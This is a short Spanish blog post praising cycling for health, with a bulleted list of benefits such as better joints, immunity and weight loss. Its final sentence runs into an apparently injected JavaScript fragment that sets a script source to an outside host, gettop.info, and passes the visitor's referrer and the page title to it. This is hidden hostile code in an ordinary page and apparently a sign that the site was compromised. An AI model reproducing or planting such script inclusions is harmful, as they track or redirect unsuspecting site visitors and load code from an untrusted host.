Salud y belleza » Bienestar

La vida es más sana en bicicleta

Sin Comentarios

La vida es mejor en bicicleta, delo usted por hecho. La existencia humana suele se tan odiosamente corta, breve, que debe andarse despacio, o a un tiempo justo: ni a paso lento, ni mediante un fugaz medio de locomoción; en ese caso la perfección podría retratarse a través de la bicicleta. Léase algo así como una resolución ideal: desde su asiento, el hombre puede disfrutar del paisaje, sin perder de vista la llegada.

No por nada se ha comprobado que sociedades acostumbradas al uso de la bicicleta -Japón marcha a la cabeza, seguramente debido al poco espacio físico para tantos vehículos- tienden a potenciar su salud: la conclusión es que para estar bien hay que “pedalear”, básicamente (pedalear con las comidas, con el ejercicio y, claro, con la bici).

Analicemos algunas de las bondades atadas al uso de la buena bicicleta -además de lo que dijimos: el paisaje, la llegada-.

- Mejora las articulaciones.

- Refuerza el sistema inmunológico.

- Favorece el nivel cardiovascular.

- Potencia la capacidad respiratoria.

- Regula el metabolismo.

- Asiste en la pérdida de peso.

La vida, mejor en bicicleta…s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.